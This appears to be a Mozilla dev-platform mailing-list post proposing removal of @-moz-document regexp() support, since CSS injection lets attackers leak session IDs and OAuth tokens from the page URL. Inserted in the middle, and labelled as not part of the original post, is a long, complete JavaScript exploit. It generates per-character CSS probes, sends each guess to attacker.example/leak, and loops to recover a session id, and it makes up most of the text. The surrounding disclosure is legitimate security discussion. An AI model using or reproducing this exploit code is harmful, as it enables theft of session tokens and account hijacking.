Summary:

Attackers can extract secret URL components (e.g. session IDs, OAuth
tokens) using @-moz-document. Using the regexp support and assuming a
CSS injection (no XSS needed!), the attacker can probe the current URL
with some regular expressions and send the URL parameters to a third party.

A demo of this exploit can be found at <http://html5sec.org/cssession/>.
This attack has also been published in the academic paper "Scriptless
Attacks: Stealing the pie without touching the sill"[1] by Mario
Heiderich et al. and numerous other presentations on this topic [2,3].
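As an added illustration of the probing loop described above (this is not code from the original post, from the html5sec demo, or from the cited paper): an attacker who can only inject CSS emits one @-moz-document regexp() block per candidate next character of the secret; the one block whose pattern matches the whole document URL applies, its background-image is fetched, and that request tells the attacker the next character. The victim origin, the attacker host, the "sid" parameter name, the hex alphabet and the tiny Firefox simulator (used so the loop runs offline) are all assumptions made for this example.

```javascript
// Added example, not code from the original post or the html5sec demo.
// Models the @-moz-document regexp() URL oracle end to end: payload
// generation, a stand-in for Firefox's matching, and the recovery loop.
const VICTIM_ORIGIN = "https://victim.example";        // assumption
const ATTACKER_LEAK = "https://attacker.example/leak"; // assumption
const ALPHABET = "0123456789abcdef";                   // assumed token charset

// Make `text` a literal match inside a CSS regexp("...") string. Two layers
// apply: the backslash must survive CSS string parsing (so it is doubled),
// and RegExp metacharacters must be escaped for the JavaScript engine.
function regexpLiteral(text) {
  return text
    .replace(/[.*+?^${}()|[\]\\]/g, (ch) => "\\\\" + ch)
    .replace(/"/g, '\\"');
}

// One block per candidate next character. regexp() must match the entire
// URL, so the pattern pins the victim origin and lets the rest vary; the
// background-image URL carries the guess back to the attacker.
function buildProbeCss(knownPrefix) {
  return ALPHABET.split("").map((c) => {
    const guess = knownPrefix + c;
    const pattern =
      regexpLiteral(VICTIM_ORIGIN + "/") + ".*[?&]sid=" + regexpLiteral(guess) + ".*";
    return `@-moz-document regexp("${pattern}") {\n` +
           `  body { background-image: url("${ATTACKER_LEAK}?sid=${guess}"); }\n` +
           `}`;
  }).join("\n");
}

// Minimal stand-in for the browser (assumption, not Firefox's real parser):
// for every regexp() block whose pattern matches the whole document URL,
// the background-image is requested. Those requests are the leak.
function simulateRequests(css, documentUrl) {
  const requests = [];
  const block =
    /@-moz-document regexp\("((?:[^"\\]|\\.)*)"\)\s*\{[^}]*url\("([^"]*)"\)/g;
  for (const m of css.matchAll(block)) {
    // Undo CSS string escaping to obtain the source the RegExp engine sees.
    const source = m[1].replace(/\\(.)/g, "$1");
    if (new RegExp("^(?:" + source + ")$").test(documentUrl)) requests.push(m[2]);
  }
  return requests;
}

// Attacker-side loop: each round extends the known prefix by one character.
// `oracle` maps injected CSS text to the URLs the victim's browser fetched.
// Stops when no candidate matches (end of the value, or a charset mismatch).
function recoverSecret(oracle, maxLength = 64) {
  let prefix = "";
  for (let i = 0; i < maxLength; i++) {
    const leaked = oracle(buildProbeCss(prefix))
      .filter((u) => u.startsWith(ATTACKER_LEAK));
    if (leaked.length === 0) break;
    prefix = new URL(leaked[0]).searchParams.get("sid");
  }
  return prefix;
}

// Constructed victim URL for the demo; the session id is a made-up value.
const DEMO_URL = "https://victim.example/account?sid=a3f9&tab=profile";
const demoOracle = (css) => simulateRequests(css, DEMO_URL);

if (typeof require !== "undefined" && require.main === module) {
  console.log(recoverSecret(demoOracle)); // a3f9
}
```

Each round costs one injected sheet of |alphabet| blocks and one outbound request, so a 32-character hex session id needs 32 rounds; in a real attack the sheet is re-injected (or re-fetched) per round rather than simulated, and the attacker reads the guess from the leak request's query string exactly as `recoverSecret` does here.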

My suggestion is to either kill -moz-document for public web content or
remove regexp support.


What do you think?


Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091
Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4
selectors.
MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document
Target release: ??
Platform coverage: desktop, android
[1] http://www.nds.rub.de/research/publications/scriptless-attacks/
[2] http://www.slideshare.net/x00mario/stealing-the-pie
[3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013
_______________________________________________
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform